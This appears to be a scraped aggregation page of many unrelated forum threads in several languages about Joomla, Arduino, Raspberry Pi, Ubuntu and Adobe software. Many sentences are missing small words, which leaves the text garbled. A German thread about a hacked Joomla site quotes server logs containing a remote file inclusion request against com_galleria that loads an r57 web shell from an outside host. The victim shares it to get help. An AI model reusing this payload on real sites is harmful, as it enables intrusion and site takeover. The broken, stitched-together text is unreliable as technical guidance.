Posts

Showing posts from February, 2011

Menydesign - Joomla! Forum - community, help and support

jeg jobber  med en site hvor jeg har 2 ønsker jeg ikke vet helt hvordan jeg skal løse: 1. jeg ønsker å ha et fast element forran hvert menypunkt, det skal være en '»'. er det mulig å få til dette uten å legge inn en bakgrunn css eller å sette den inn på navnet på menylinken? 2. når brukeren er klikker på en link skal den få en farge som illustrer @ det er denne siden brukeren er på, helt til han/hun da klikker på en ny link, da skal den få den fargen å illustrere @ brukeren er på den siden. finnes det noen god løsning på dette? et lite tilleggspunkt, jeg har satt opp følgende css-en min: code: select all a.mainlevel_hovedmeny:link, a.mainlevel_hovedmeny:visited {   font-family: verdana, arial, helvetica, sans-serif;   font-size: 10px;   color: #68676c;   line-height: 1.8em;   padding-left: 10px;   padding-bottom: 2px;   padding-top: 2px;       display: block;   width: 157px;   height: 18px; } a.mainlevel_hovedmeny:hover {   text-decoration: none;   color: #333; } table.moduleta

[SOLUCIONADO] Por qué funciona con micro de ARDUINO UNO y no con micro nuevo?

tengo un programa para arduino uno-r3 con tamaño binario del sketch 30.180 bytes (de un máximo de 32.256 bytes) y funciona perfectamente ejecutándolo desde la placa arduino con el micro original. si extraigo el microcontrolador y lo inserto en una placa diseñada por mi. también funciona adecuadamente. el problema es que si cojo un chip nuevo igual al de arduino (atmega328p-pu), le cargo el bootloader y le cargo mi programa, este no funciona adecuadamente. ejecuta parte de mi software pero se cuelga enseguida. ¿qué opináis?   solucionado el problema era que mi programa al ejecutarse toma valores de configuración de la eeprom y al ser el micro nuevo la eeprom está con los valores por defecto, esto hace que la configuración sea ilógica y el programa se ejecute mal. por tanto: al grabar un nuevo chip si el programa usa valores de la eeprom inicializa también ésta. saludos Arduino Forum > Intern

Using both a USB Mic and on board audio output - Raspberry Pi Forums

i'm trying set rpi on-board sound out , usb mic in, i've found deals both audio i/o on same (external) sound card. what's happening in situation regardless of default sound card set, either 1 of aplay or arecord fail error message looks like: code: select all arecord: main:682: audio open error: no such file or directory (replace arecord aplay if default card set usb mic). example, have following scenario: in /etc/modprobe.d/alsa-base.conf , commenting out options snd-usb-audio index=-2 allow arecord work, not aplay, , uncommenting above line allow aplay work, not arecord know can add device name when running command (example: arecord -dhw:1,0 test.wav works, arecord test.wav doesn't), not happen because i'm using bunch of pre-compiled libraries seem consider default devices you can create 'asymmetric' alsa device uses both cards. in ~/.asoundrc, example: code: select all pcm.!default { type asym playback.pcm "hw:0,0" capture

Thread: something wrong with my internet!!

Image
i got dell mini 9 , has ubuntu dnt no how use it..but when got it, connect other peoples wireless fine...and not working says connected when try search stuff keeps coming address not found blah blah blah doing every thing go onto?? dnt no wat do? i had same problem - had wireless connection no internet. in end discovered router, did not support ipv6. see if problem, in terminal type dmesg if gives error ipv6 there plenty of fixes available google or ubuntu forum search. used simplest , worked immediately. pardon script first post , not know how fancy boxes yet. sudo su echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6 check if has changed cat /proc/sys/net/ipv6/conf/all/disable_ipv6 if comes 1 things looking good. type exit reboot make sure , being internet work. if not go firefox , disable ipv6 within firefox about :config filter ipv6 toggle disable_ipv6 line false true. restart firefo

I feel like betrayed - Raspberry Pi Forums

Image
hey guys, know of "wtf u stupid" feel betrayed. in december in 2015 bought raspberry pi 2 because thought, there won't new pi in next 2 or 3 years. , released new one... if have known release new one, have waited 2 or 3 monthts. there way change raspberry pi 2 raspberry pi 3? btw: sorry bad english :/ i'm afraid these things happen. technology changes rapidly, , plans. 1 thing remember, pi2 have same pi2 had yesterday. same things before. haven't lost performance. i'm still using pi2 (and pi1 somewhere) - job. raspberrypi

Stromüberspannung - Arduino / Windows 7

hey, ich wollte gerade mein motor shield auf dem arduino befestigen als windows mir, als es drauf war, sagte, das mein arduino zuviel strom zieht und den usb port deaktiviert. der arduino hat eine externe stromversorgung (netzteil) und das problem kommt immer wieder. auf dem motor shield ist nichts angeschlossen und arduino auch net. was ist das problem? link: arduino: http://www.amazon.de/sunfounder-project-starter-mega2560-raspberry/dp/b00cxmmdzi/ref=sr_1_6?s=computers&ie=utf8&qid=1422375433&sr=1-6&keywords=arduino+sunfounder motor shield: von sainsmart moin, ich tippe auf einen kurzschluss auf einer platine. gruss kurti Arduino Forum > International > Deutsch (Moderator: uwefed) > Stromüberspannung - Arduino / Windows 7 arduino

Thread: bit depth

Image
hey all. trying highest bit depth on pc possible. looks kind of cloudy right now. running karmic , have not had luck standard ways. here screenshots of efforts, if can great. attached images display_pref_ss.jpg (106.5 kb, 6 views) gkedit_xorg.jpg (89.8 kb, 4 views) Forum The Ubuntu Forum Community Ubuntu Official Flavours Support New to Ubuntu [ubuntu] bit depth Ubuntu

Measuring the output voltage of a Buck converter with Arduino

hello ! i realized buck converter circuit, every time vary input voltage , measure output voltage voltmeter . step worked well. indeed, every time vary input voltage found variation in output voltage. but when used arduio measure output voltage found problem. vary input voltage between 0 v , 12 v find 0 v or 12 v. how measure converter buck output voltage sufficient precision? with kindest regards, besma lassoued quote but when used arduio measure output voltage found problem. vary input voltage between 0 v , 12 v find 0 v or 12 v.   this invalid question. not sure asking. assume read specs arduino analog input , realize cannot measure voltage greater 5v analog input. in view of , please restate question. Arduino Forum > Using Arduino > General Electronics > Measuring the output voltage of a Buck converter with Arduino

Would somebody like to convert a template for me from Dragonfly? - Joomla! Forum - community, help and support

hello! i have used dragonfly cms , in new version, 9.1.1, made security got way good. among tons of other things, got df, , decided change joomla, have used little before. so question is; there bother converting template me? the template used on http://www.trentbruner.net , , if me: here template files. menu images in menu -> norwegian/english , css-styles menu in style -> menu.css . any appreciated! Board index Joomla! Older Version Support Joomla! 1.0 Templates & CSS - 1.0.x

Thread: 9.04 -> 9.10 M-audio Delta 66 sound does not work any more

hi, really, have wonder why still have struggle sound issues although it's 2010 already. i've been satisfied ubuntu, frankly speaking - sound issue getting nerves. started using linux in 1998 , understood had manually tweak audio settings then, hey - it's 2010 , linux has been out many years , professional m-audio audio hardware has been out decade not talking new hardware here. m-audio delta 66 pci card working flawlessly 9.04, once upgraded facing similar kind of issues did in 90s. suppose should prompt , start manually editing configuration files of yet sound system supposed solve problems. can not understand why seems impossible implement working out-of-the-box sound solution. sorry rant. had it. please try this: http://ubuntuforums.org/showthread.php?t=1285976 Forum The Ubuntu Forum Community Ubuntu Official Flavours Support

different access to different editors - Joomla! Forum - community, help and support

hello! i have such problem. site consists of different parts (sections, static content etc.). and want give permissions different editors, each of them must have access edit (create/edit content, upload files, create submenus...) particular section... but standart joomla has administrators/managers having access content , authors/publishers cannot access comfortable admin panel , hardly can something... (edit content, created him) that can advice me? how fix it? thank you! Board index Joomla! Older Version Support Joomla! 1.0 Administration - 1.0.x

Is there a component or module that will..... - Joomla! Forum - community, help and support

allow me let users on site access sections? at moment, have section on site people can access - problem is, can set public access (where can access it) or registered access (where registered members can access). what i'd able set audio section registered members choose allow access can view particular section. i don't want registered members access section - select few. is there allow me this? thanks in advance. look on extensions site under core enhancements -> group access there 1 main component real group access control jacl plus the downside is not stand alone addon. needs modify quite large number of core files during installation allow group access control. i installed on site yesterday it takes time need change lot of file permissions on existing files. created clone of site first test run smoothly before working on real site. it working , doing wanted. as joomla 1.0.12 stable , not updated, issue of core file modification less of problem might be.

Uno + 2,8 TFT Touch shiel

hello, when try load program memory, let me know: http://wiki.iteadstudio.com/2.8_tft_lcd_touch_shield would not advise do. thanks binary sketch size: 38 828 bytes (of 32 256 byte maximum) processing.app.debug.runnerexception: sketch big; see http://www.arduino.cc/en/guide/troubleshooting#size tips on reducing it. at processing.app.sketch.size(sketch.java:1653) at processing.app.sketch.build(sketch.java:1586) at processing.app.sketch.exportapplet(sketch.java:1608) at processing.app.sketch.exportapplet(sketch.java:1594) at processing.app.editor$defaultexporthandler.run(editor.java:2382) at java.lang.thread.run(thread.java:619) the sketch big because you've loaded screens, in file file memorysaver.h have disable controlers you're not using (see file attached) in .cpp there should line : #include "memorysaver.h" succes, robert Arduino Forum > Using Arduino

MPU6050 connected to NANO (Salve) sending data to UNO(Master) through SPI!

hi all i have connected mpu6050 arduino nano i2c (jeff rowberg) , want send sensor readings of nano uno (master) using spi! my master(uno) , slave(nano) can't communicate while want report sensor values in slave using spdr ''http://www.gammon.com.au/forum/?id=10892'' explains !!! (sensor readings are'nt transfered in master) i have serial.begin(...) in both master , slave (in master run slave communication , in slave read mpu6050 data) problem?! thanks in advance this nick gammon's webpage on spi under topic "slave select". quote thus, slaves should let each of lines float (as inputs) unless slave select taken low. then, , then, should configure miso line (master in, slave out) output, can send data master. however, under "how make spi slave", example not follow that. sets miso line output in setup function , never changes input. mean 1 slave work on spi bus. nick gammon have explain you.

Thread: HPLIP Fax driver not installing in 9.10

hi there! i'm relatively new user linux, previous experience being embedded linux on nslu2. had old pc , decided see fuss about, today installed ubuntu first time. far good! got hooked sony bravia via vga port , got old geforce 2mx pumping out 1360x768 using nvidia driver, looks awesome! got restricted codecs , whatnot, no troubles @ all. trouble hplip fax driver. did sudo aptitude install hplip-gui "work-around", sudo hp-setup. went well, detected networked hp c7280 without problems, , i've since tested printing , scanning , both fine. right @ end, terminal reports following: \error: unable locate hplip fax ppd file: hp-fax-hpcups.ppd.gz fax setup has been disabled does have ideas how fix this? i'm new linux really, although think i'm doing pretty far! i in same boat. so, figures out, great! Forum The Ub

Frontpage wil niet laden: code van index.php wordt getoond - Joomla! Forum - community, help and support

hoi, ik probeer naast onze huidige website in de root een kopie te maken in een subdomein (voor een nieuwe taal). het kopieren van de website weliswaar eerder wel gelukt, maar dat van domein naar domein. nu het als volgt: van:  /home/vhosts/mydomain/httpdocs naar: /home/vhosts/mydomain/subdomains/en/httpdocs naar het nieuwe subdomein gaan via de browser (frontpage of admin) resulteert in de inhoud van index.php ( http://en.denhaagstudentenstad.nl ) als code, alsof de frontpage niet wil laden. configuration.php zou ok moeten zijn; live site, abs path, cache path, db name, db user , db pass aangepast zoals geconfigureerd bij het nieuwe subdomein. alle rechten heb ik goed gezet dus daar kan het niet aan liggen. heeft iemand een idee wat ik fout doe? ik heb geen idee of joomla wel bij de database kan of dat er iets anders fout gaat.... alvast bedankt! ik zou aan de hoster vragen of /home/vhosts/mydomain/subdomains/en/httpdocs ook "geparsed" wordt (dat php uit die directory ook

Why is my e-mail not working? anybody willing to help? - Joomla! Forum - community, help and support

Image
i using free hosting account http://www.freehostia.com not have smtp access them, i wondering if use gmails smtp ( see: http://forum.mamboserver.com/showthread.php?t=74144 ) i have tried searching forum, searching google, have had no luck. my isp optus, , believe have smtp access, , page http://www.optuszoo.com.au/help/dial/connected says smtp (outgoing) mail server - mail.optusnet.com.au (port 25) and tried unicversities smtp server, http://www.its.monash.edu.au/staff/emai ... index.html which says smtp: (outgoing email) smtp.monash.edu.au, port 465, use secure connection (ssl) in of above entered email address , password, , yet dont work! i have tried searching forum fix problem havent found solution! my next option paying hosting company smtp access! wanna keep last resort. i have tried using php mailer, sendmail , smtp mail functions , noe of them seem work! mail sent, theres no mail in inbox! using gmail id, tried using hotmail id did not work! when use smtp server mailing says

Need help on choosing Sensor board

i software engineer , new sensors.i doing experiment mqtt protocol.i want choose sensor board cost effective low budget experiments.i trying out motion detector sensor attached sensor board in http://m2mio.tumblr.com/post/30048662088/a-simple-example-arduino-mqtt-m2m-io arduino uno.i need buy right hardware implementing this.for arduino uni ,can buy arduino uno "http://potentiallabs.com/cart/arduino-uno"? ethernet shield ,can buy "ebay.in/itm/wiznet-w5100-ethernet-shield-for-arduino-uno-mega-with-sd-card-slot-/161523012757?pt=in_computer_components&hash=item259b859495"?should have buy ethernet shield sure when buy arduino uno? there other sensor boards other arduino uno simple configure,support mqtt,cost effective suitable low budget projects? please not cross-post.  other thread removed. Arduino Forum > Using Arduino > Sensors

[svn] 2533: Added setSelection() and insertText() methods to TextView and TextArea.

revision: 2533 author: gosmith@adobe.com date: 2008-07-18 16:52:27 -0700 (fri, 18 jul 2008) log message: ----------- added setselection() , inserttext() methods textview , textarea. renamed append() method appendtext(). reviewer: alex bug: - qa: no doc: no modified paths: -------------- flex/sdk/trunk/frameworks/projects/flex4/src/flex/component/textarea.as flex/sdk/trunk/frameworks/projects/flex4/src/flex/component/textview.as More discussions in Commits adobe

Thread: No upgrade from 9.10 beta?!?!

Image
i've been running 9.10 beta time , looking forward todays release when went update manager told me system date except 1 package (opera). possible there haven't been changes @ in last few days? how can check if version using still beta or not? thanks! posted crowchild i've been running 9.10 beta time , looking forward todays release when went update manager told me system date except 1 package (opera). possible there haven't been changes @ in last few days? yep. posted crowchild how can check if version using still beta or not? thanks! if you've been keeping updates - appears have - you've got latest. Forum The Ubuntu Forum Community Ubuntu Community Discussions The Cafe

Using Current Sensor to Cut Off

Image
hello everyone, please me first time project using current sensor. i'm planning make "auto stop power window" old car (rear window) when goes way up. it's safety when kids hit button close window , hand hold window down. know kids imagination.. . i've tested power window motor ampere rise when forced stop movement. way, thinking can use current sensor tell arduino when dpin 2 high become low in ampere received pin a0. i've made schema attached here. concept when button pressed once, dpin 2 continuously high until pin a0 gets sense (between 3a - 5a) current sensor tell dpin 2 low. that's all. i don't know how create sketch in arduino. please help... thanks. you need state current sensor have (there many) , have tried. on line, there number of arduino tutorials reading current sensors. Arduino Forum > Using Arduino > Sensors

SEITE GEHACKT - Joomla! Forum - community, help and support

Image
>:( irgend ein spinner hat meine seite gehackt habe sie aber wieder hinbekommen .  ich wollt mal die logs vom server posten und fragen ob es reicht den ordner /com_galleria zu löschen ? unter den installierten komponenten find ich die galleria nicht konversation webhostone: hallo, hier die logs aus ihren logfiles, welche für den hack verantwortliche ist. setzen sie sich besten mit den entwicklern der software in verbindung und prüfen sie, ob sie aktuelle versionen installiert haben, und für möglichkeit bestehen, dass dieser schädliche code nicht mehr ausgeführt werden kann. ansonsten wird ihnen das jetzt wohl öfters passieren. 85.96.84.95 - - [18/feb/2007:16:24:02 +0100] "post /components/com_galleria/galleria.html.php?mosconfig_absolute_path=http://hackharekat.com/shell/r57.txt? ht tp/1.1" 200 14589 "http://hutzelonline.de/components/com_galleria/galleria.html.php?mosconfig_absolute_path=http://hackharekat.com/shell/r57.txt?" "mozilla/4. 0 (compatible; msie

Thread: Adobe Dreamweaer, Photoshop and Flash on Ubuntu - don't know how to install

Image
hello everybody! i'm green here, , need installation. need install dreamweaver, photoshop , flash adobe cs3 package, , have no idea how it. i've read posts here, , i've seen "wine" mentioned many times, don't know mean, couldn't figure for.... if explain me, please, step step, how , put wine, for, , how install adobe package, i'd appreciate much. p.s. know terminal, rest unknown me. thank much!! posted tothebone hello everybody! i'm green here, , need installation. need install dreamweaver, photoshop , flash adobe cs3 package, , have no idea how it. i've read posts here, , i've seen "wine" mentioned many times, don't know mean, couldn't figure for.... if explain me, please, step step, how , put wine, for, , how install adobe package, i'd appreciate much. p.s. know terminal, rest

Saeven|CRM + Joomla 1.0 Integration Completed - Joomla! Forum - community, help and support

Image
hi joomers,   group of our own community members had requested integrate joomla our helpdesk, saeven|crm (formerly known auracle support engine),  in such fashion users log helpdesk using joomla credentials.  we're quite enthused report integration complete, , quite installed.  it's composed of twirl integration drop-in xmlrpc portal we've built joomla (one can read twirl @ http://crm.saeven.net/index.php?page=twirl ).   hope reaches scrm + joomla users might have missed our announcements, , of course, needs bridge between helpdesk , joomla!   if have additional requests, please don't hesitate ask!  closing, it's been pleasure working exclusive , brilliant user community  cordially. alex thanks alex / auracle support engine, you guys did fantastic job on intergration. not thank enough great job on intergration.  love it. auracle support engine great system. move system 7 days ago. ask them joomla integration. , within 2 days integrated , functioning well. our regi

Thread: connect Ti89 titanium to intrepid ibex

i have been searching web , have yet find instructions allow ti89 connect computer. tried tilp , tilp2 no avail. tilp showed "status:not connected" , tilp2, couldn't packages open right, don't remember error sorry. topics have been reading(the "helpful" ones) 08, maybe there else can now? ever instructions gracious posters, wonderful if was: copy such , such terminal, 1/2 step @ time if not. thank in advance. someone must know something, please me. Forum The Ubuntu Forum Community Ubuntu Official Flavours Support New to Ubuntu [ubuntu] connect Ti89 titanium to intrepid ibex Ubuntu

Send key strokes via serial.write

Image
i trying send ctrl+k keystroke through serial write computer.  having troubles finding correct hex, ascii, or decimal this.  compiler error when working way.  understand not leonardo or flash dfu arduino. i have sent space command.  using additional program acc keys capture serial data.  arduino uno r3 ide arduino 1.0.6 using arduino: 1 week  i appreciate either proper search topic or code.  have spent 2 days looking key command without sending scanner or lcd display. i don't understand error , warning yet.  sorry if has been asked already.  thank help. my code code: [select] // function changecolor send keystroke 'ctrl+k' computer void changecolor () {   int keycommand[] = {0};   keycommand[0] = 11;   serial.write(keycommand, 8); } error code: [select]   report have more information with   "show verbose output during compilation"   enabled in file > preferences. arduino: 1.0.6 (windows 7), board: "arduino uno" photobooth2.ino: in function

[svn] 4570: Fixed bug where we might drop some fault events that should be delivered when we are not

revision: 4570 author: jvroom@adobe.com date: 2009-01-16 13:42:06 -0800 (fri, 16 jan 2009) log message: ----------- fixed bug might drop fault events should delivered when not able connect. batch messages waiting clientid assigned in clientidwaitqueue. when flushing queue, if have no clientid (i.e. faulting these messages), if there more 1 message in queue, we'd end putting messages right in queue instead of faulting it. change, we null out queue temporarily internalsend faults message. qe: no doc: no blazeds checkintests: pass reviewed by: seth modified paths: -------------- flex/sdk/trunk/frameworks/projects/rpc/src/mx/messaging/messageagent.as More discussions in Commits adobe

Jessie lite - not using full cap. of SD - Raspberry Pi Forums

hi, i've installed jessie lite img win32diskimager on 4gb microsd card. (noobs doesn't have option install jessie lite). when check available space (df -kh) can see 1.3gb (the img size) allocated out of 4gb card leaving little free space. there anyway write img , /dev/root utilize whole 4gb ? noobs uses whole 4gb, can't find way install jessie lite using it. appreciate help. ziv first port of call when installing *any* of rpf raspbian images expand file system. jessie lite use code: select all sudo raspi-config , select 'expand filesystem' raspberrypi

[svn] 3747: Fixing the asdoc target to generate html output for projects.

revision: 3747 author: gauravj@adobe.com date: 2008-10-20 11:16:13 -0700 (mon, 20 oct 2008) log message: ----------- fixing asdoc target generate html output projects. qe notes: none doc notes: none modified paths: -------------- flex/sdk/trunk/asdoc/build.xml flex/sdk/trunk/build.xml added paths: ----------- flex/sdk/trunk/asdoc/projects-asdoc.xml removed paths: ------------- flex/sdk/trunk/asdoc/build.properties flex/sdk/trunk/asdoc/mxml-manifest.xml More discussions in Commits adobe

SMS & Call controlled I/O, Easy for some! - Raspberry Pi Forums

hi there, new , green toward gear most, drawn toward technology because never had when younger! interest in raspberry pi leaning toward necessity company deal consumer ripping me off blind! project involves assembling little board suitable 3g modem option capable of talking australian gsm networks. need "device" have 4 x output contacts (n/o-c-n/c) 1 of 4 outs driven incoming call can latch or pulse depending on user setup. (c.l.i dependent via user list of numbers) balance 3 of 4 outs sms driven "#on & #off command" outputs remember last state after power cycle. 4 x inputs (v/free) capable of triggering message either open/closed state. (1 input = 2 x messages@ 32 characters each & user programmable) inputs trigger instant messaging per state of each input maximum of 4 users per input. users contained in user c.l.i list. 100 potential users call in (out1 relay) operation. device run on 8 - 32 volts dc plus have backup battery if supply off

Messaging Service from Java

i have java web service i've created method adds entries our database. @ same time i'm looking push java web service flex clients, i'm encountering problem on java side. the problem unlike producer/consumer objects - java side has no selector property allow push message clients running our flex application. any assistance/ideas appreciated. hi. i'm not sure how intend differentiate between clients think should still able use selectors behavior want. when create message on server can add header message. message delivered consumers have selector expression matches on header. work you?   -alex    More discussions in General Discussion adobe

Thread: update firefox 3.5.3

firefox 3.5.3 comes major security-update. using version, , installed version in way: http://www.psychocats.net/ubuntu/firefox , please update firefox 3.5.3 via code: gksudo firefox to firefox 3.5.4 mentioned. (on site) you should extremely careful trying run firefox root. you're giving power whatever wants. Forum The Ubuntu Forum Community Ubuntu Specialised Support Security [ubuntu] update firefox 3.5.3 Ubuntu

"endpoint" encountered a socket write error.

blazesds: 3.0.0.544 flex:flex sdk 3 sever-side: 1. managing accepted messageclient. 2. broadcasting received message every client. 3. communication via streaming channel. after several 20 clients connected server, warning message popped out. 'endpoint id'my-streaming-amf' closing streaming connection flexclient id'xxxx' because endpoint encountered socket write error, possibly due unreponsive flexclient. actually, nobody closed client. my question when session destroyed. a. no session timeout, caused channel lasted 2 seconds before interrupted. b. test done in inner network(lan). c. issue can reproduced time. More discussions in General Discussion adobe

Thread: What about the ASUS G1SN and ubuntu 9.10?

hi ubuntu community. have been reading post: http://ubuntuforums.org/showthread.php?t=950014 have checked asus website, never update bios. wondering if ubuntu 9.10 include "patch" make work or no. not super power user. know far if spend full evening on going right, easier , cleaner me wait next release (this week think). i'm quite interested in issue too. it's annoying having patch kernel. has tested karmic g1sn yet? Forum The Ubuntu Forum Community Ubuntu Official Flavours Support Hardware [ubuntu] What about the ASUS G1SN and ubuntu 9.10? Ubuntu

Images missing in Internet Explorer 7 - Joomla! Forum - community, help and support

hello joomla 1.0.12 smf 1.1.2 smf bridge 1.1.7 in firefox , opera ok. in internet explorer 7 [i don't have 6 test], uploaded images , theme images missing. meaning links images  are  : code: select all http://www.website.tld/component/option,com_frontpage/itemid,1/templates/template/images/path.png or code: select all http://www.website.tld/content/section/4/31/templates/template/images/path.png on forum page [wrapped] ok including ie7. please give me hint. regards /update it seems issue present when joomla in maintenance mode. Board index Joomla! Older Version Support Joomla! 1.0 Templates & CSS - 1.0.x

Trimming the bezel on the 7 inch - Raspberry Pi Forums

so posted wii u case project i'm going start. watched 1 video suggested trimming bezel possible, wanted know if done yet , if theres tutorial (or recommended method of trimming) i'm kinda pushing limits size limitations need trim go. suggestions, -cb edit: also, have dimensions of screen without bezel? i'm having issues guessing measurements without in-front of me. the mechanical drawing "official" screen here: https://www.raspberrypi.org/documentati ... 092015.pdf raspberrypi

IDE 1.0.x and 1.5.x on same windows 8 machine?

Image
i have 1.5.8. ide , running on windows 8 machine , add 1.0.6 ide can program attiny88 using attiny core https://github.com/tcworld/attinycore apparently works on 1.0.x ide ( did install on windows 7 portable has 1.0.5 ide , woks fine--but computer not handy me use. the problem when download 1.0.6 ide, on desktop windows 8 machine, , try install it  pop window appears , says must un-install 1.5.8 ide first. not want number of reasons. any solution available? thanks in advance david g. turns out if install 1.0.6 .zip file work fine 1.5.8 installed!!   david g. Arduino Forum > Using Arduino > Installation & Troubleshooting > IDE 1.0.x and 1.5.x on same windows 8 machine? arduino

Please advise - urgent

Image
hello, i need help!  i developing worlds first wrist worn adaptive virtual reality controller, moves hand when grab tool in-game. timing synced controller arrives in hand @ moment of grabbing in-game (seperate optional sync function) the goal of bridge gap between op hand capture , controllers. here proliminary design : this part of larger venture called experience (software platform). http://experience.freeforums.org/ ok so, here issue. i new arduino, , need know board following parts -8 buttons -mouse wheel -servo -linear servo -2pcs ky-040 rotary encoder module arduino avr pic -6 axis mpu6050 sensor serial gyroscope acce​lerometer sensor module arduino -mpu6050 6 axis gyroscope acce​leromete sensor module arduino -ky-003 hall magnetic sensor module arduino avr pic -ky-023 ps2 game joystick axis sensor module arduino avr pic -infrared ir sensor obstacle avoidance sensor smart car arduino -passive buzzer module 5v buzzer control panel arduino avr raspberry pi mega -sound de

copy public ssh key - Raspberry Pi Forums

hi there, i've done before, can't work out did, , permission denied. command trying: code: select all cat ~/.ssh/id_rsa.pub | ssh username@remote_host "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys" or there easier way this? have tried both root , not root. hard if don't know of 3 command gives error. raspberrypi

Best way to get PCBs

all, forgive ignorance here - i've never set project wasn't on breadboard radioshack. i'm wondering best way hands on multiple pcbs (maybe many 200) of simple design.  i'd mounting: 1 atmega328, 1 piezo buzzer, 2 tactile switches, 1 led, 2 rf transmitters, , 2 cr 2032 holders on 4 inch x 4 inch pcb.  and, obviously, tracks link them.  so, that's couple dozen holes , dozen or tracks.  don't care solder masks or fancy @ moment. so, what's best way hands on these pcbs?  when @ 'design , order own pcbs' websites, prices seem fluctuate dramatically 5 dollars 50 dollars piece, , of them seem assume boards more complicated need.  but, diy printing , etching own seems take long time.  has else found efficient , inexpensive method? thanks! matt  simple, make schematic in 1 of programs available, send design off pcb fab facility, wait boards come in. if can keep board under 5cm x 5cm. great price. you can make multiple layouts or

InDesign CS3, Objekte lassen sich nicht auswählen

hallo, ich habe ein problem mit einem frisch in indesign cs3 5.0.4 (windows vista) erstelltem dokument. ich kann plötzlich kein einziges objekt auswählen. als ob etwa alle gesperrt werden, aber nicht der fall ist. auch alle ebenen sind frei für die bearbeitung gegeben. ich kann aber neue objekte platzieren/erstellen. nach abspeichern, beenden und wider öffnen ist nur das neue objekt editierbar. in dem dokument sind textrahmen, platzierte fotos sowie zwei indesign cs3 dokumente die um 90 grad gedreht sind. woran es liegen kann? vielen dank More discussions in Deutsche Foren adobe

Photoshop CS 1 lässt sich nicht mehr öffnen

mein photoshop version cs 1 lässt sich plötzlich leider nicht mehr öffnen, alle anderen programme aus der creative suite funktionieren problemlos. beim klicken auf das programm lädt die software nur schriften, pinsel... bis zum punkt "global textressourcen werden gelesen... fertig." ich habe dann photoshop deinstalliert/installiert. als ich dann ps öffnen wollte kam folgende meldung: das primäre arbeitsvolumen von adobe photoshop und die primäre auslagerungsdatei von windows befinden sich derzeit auf demselben volumen, zu leistungseinbußen führen kann. es wird empfohlen für das primäre arbeitsvolumen von adobe photoshop ein anderes volumen zu wählen, nach möglichkeit auf einem anderen physikalischen laufwerk. liegt hierbei das problem? und wenn ja wie kann ich es lösen? bin im moment radlos und hoffe mir kann jemand weiterhelfen? hallo daniela, wieviel speicherplatz hast du noch frei auf c. bzw. der partition, wo photoshop installiert ist? mit welchem betriebssystem arbei

[شرح] إضافة رابط لكمبوننت Component فى قائمة - Joomla! Forum - community, help and support

Image
[center] السلام عليكم [color=black][size=100]أقدم لكم شرح إضافة رابط لكومبننت component فى أى قائمة فقط إتبع الشرح بالصور فى البداية إذهب إلى لوحة تحكم المجلة ثم إختر القائمة التى تريد وضع الرابط فيها ثم إختر new بعدها إختر ثم إضغط على حفظ أتمنى أن يكون الشرح أفادكم أخوكم [color=royalblue]عمرو [/color][/color][/size] [/center] Board index Joomla! International Language Support International Zone Arabic Forum جوملا! 1.0 القسم العام

Web Designer nach HH gesucht

als webdesigner ist kreatives denken und design ihr heiligtum. ihre stärken liegen in den bereichen multimedia und konzeption. sie beherrschen nicht nur die erstellung von websites, sind sicher in bild-, video- und sound-editing, sondern haben auch grundkenntnisse in html und wissen, im web möglich ist. wenn sie eine abgeschlossene ausbildung / studium im bereich gestaltung haben und fit in photoshop, freehand, flash und macromedia director sind, sollten wir miteinander ins gespräch kommen. es erwartet sie ein zukunftsorientierter, interessanter arbeitsplatz mit vielfältigen aufgaben und aufstiegsmöglichkeiten in einem jungen, tatkräftigen und lockeren team. wenn sie mit uns gemeinsam erfolgreich sein und von den vielfältig gebotenen entwicklungschancen profitieren möchten, richten sie ihre bewerbung mit gehaltsvorstellung und nächstmöglichem eintrittstermin bitte die familyharbour.de ag -webprogrammierung- kielerstr.2 22769 hamburg sehr geehrte damen und herren, mit interesse

Thread: Firefox 3.5.2 did not get replaced with upgrade to Ubuntu 9.10

a couple of months ago installed firefox 3.5.2 manually under ubuntu 9.04. finished live upgrade ubuntu 9.10. old firefox still on system. i'd remove , install firefox 3.5.3 found in synaptic. firefox resides @ /opt/firefox. can remove directory , contents , install synaptic? ther other files manually remove? problem resolved. found instructions via google on removing /opt/firefox installed canonical version of firefox 3.5.3 works flawelessly. Forum The Ubuntu Forum Community Ubuntu Official Flavours Support General Help [ubuntu] Firefox 3.5.2 did not get replaced with upgrade to Ubuntu 9.10 Ubuntu

Easiest way to control 4 motors, up to 25A each

is there shield board let arduino control 4 380 motors 25a. i building rc tank project, require control both tracks, 2 380 motor , turret move 2 smaller motors. of them need bi-direction, , proportionate speed controlled. 380 motor 20a when stalled, ebay motor shield 2a most, there bigger 1 mosfet? why there seems no 1 develop larger motor shield arduino. quote from: modeler on dec 11, 2014, 05:53 am ........why there seems no 1 develop larger motor shield arduino. maybe because arduino considered hobby micro. not many hobbiests need such big motors. weedpharma Arduino Forum > Using Arduino > Motors, Mechanics, and Power (Moderator: fabioc84) > Easiest way to control 4 motors, up to 25A each arduino

Thread: Permission Denied when running PHP script from terminal

Image
hi all, need here. planning use cron_jobs execute php script automatically . when try execute script terminal (prompt) test it, gives error messages says : html code: root@ubuntu-server:~# /var/www/leiloes/www/htdocs/cron_jobs/generate_static_content.php bash: /var/www/leiloes/www/htdocs/cron_jobs/generate_static_content.php: permission denied i setup users account , permission read , write, root , in cron_jobs folder, listed in .htpasswd. there missed ? thank kind assistance anda helps. did make script executable? post output of ls -l on file Forum The Ubuntu Forum Community Ubuntu Specialised Support Development & Programming Programming Talk Permission Denied when running PHP script from terminal Ubuntu

5 Flex Sensors with 5 Servos

good evening                     m working on project includes controlling 5 servos 5 flex sensors. have written code , works fine 1 flex sensor attach more servos  and more flex sensors. after addition of more flex sensors whenever flex 1 of  sensors servos start moving synced or attached same flex sensor. would appreciate help.  code can viewed in attachment , pasted below. ///////////////////////////////////////////////////////////////////////////////////////////////////////// #include <servo.h> // include servo library servo  servomotor1,servomotor2,servomotor3,servomotor4,servomotor5; // creates instance of servo object control servo int analogpin1 = 0; int analogpin2 = 1; int analogpin3 = 2; int analogpin4 = 3; int analogpin5 = 4; // analog pin sensor on int analogvalue1= 0; int analogvalue2= 0; int analogvalue3= 0; int analogvalue4= 0; int analogvalue5= 0; // value returned analog sensor int servopin1 = 2; int servopin2 = 3; int servopin3 = 4; int servopin4 = 5;

Hoe to Finalize project?

